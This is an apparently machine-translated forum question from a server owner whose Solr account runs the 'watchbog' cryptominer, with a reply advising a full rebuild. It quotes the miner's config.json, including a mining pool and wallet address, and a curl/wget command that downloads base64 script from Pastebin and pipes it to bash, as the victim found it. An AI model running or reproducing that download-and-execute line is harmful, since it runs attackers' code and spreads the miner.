J'ai trouvé cette question ci-dessous mais j'ai besoin de plus de clarification, c'est pourquoi j'écris à nouveau.
J'ai un processus appelé "Watchbog" qui collecte complètement mon CPU et je ne sais pas ce que c'est
J'ai donc fait des creuser et j'ai constaté qu'un exécutable est exécutable à partir de la /tmp
répertoire. La structure de dossiers est quelque chose comme ceci:
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data
Dans ce dossier, il y a deux fichiers, un exécutable watchbog
qui est en cours d'exécution et un config.json
. Ceci est le contenu du fichier de configuration,
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"id": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"asm": true,
"autosave": true,
"av": 0,
"background": true,
"colors": true,
"cpu-affinity": null,
"cpu-priority": 3,
"donate-level": 1,
"huge-pages": false,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 100,
"pools": [
{
"url": "pool.minexmr.com:443",
"user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -1,
"tls": false,
"tls-fingerprint": null
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": [
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
}
],
"user-agent": null,
"syslog": false,
"watch": false
}
Mais la suppression des dossiers ne nous aide pas, ils sont recréés avec quelques secondes. J'ai donc essayé de voir quel autre processus courent et j'ai trouvé ces
solr 32616 0.0 0.0 4504 780 ? Ss 13:10 0:00 /bin/sh -c (curl -fsSL https://Pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr 32618 0.0 0.0 11224 2924 ? S 13:10 0:00 bash
solr 32623 0.2 0.0 11644 3376 ? S 13:10 0:00 /bin/bash
solr 32656 200 0.1 270204 6996 ? Ssl 13:10 0:26 ./watchbog
L'URL Pastebin pointe vers une autre commande shell avec une autre commande shell avec une autre URL Pastebin.
(curl -fsSL https://Pastebin.com/raw/nMrfmnRa||wget -q -O- https://Pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash
Cette seconde URL de Pastebin pointe vers un script shell codé de base64. Je ne peux pas l'inclure ici en raison de la limitation des personnages. Voici le lien: https://pastebin.com/raw/nmrfmnra
Je ne suis pas expert dans ce domaine, mais il semble que le script définit un travail cron qui télécharge à nouveau l'exécutable.
C'est tout ce que je pouvais trouver seul, quelqu'un peut-il s'il vous plaît guider sur la manière dont je peux arrêter tout cela ou que je devrais redéployer le serveur à nouveau?
De mon point de vue, il n'ya aucun moyen de dire si le reste du serveur est en sécurité ou non. Si j'étais vous, je hangais des fichiers pour enregistrer et recréer un nouveau serveur pour vous assurer qu'il n'est pas compromis. Sinon, vous pourriez vous retrouver comme BlankMediaGames et avoir des fichiers de fuir des années plus tard. Mieux sûr que désolé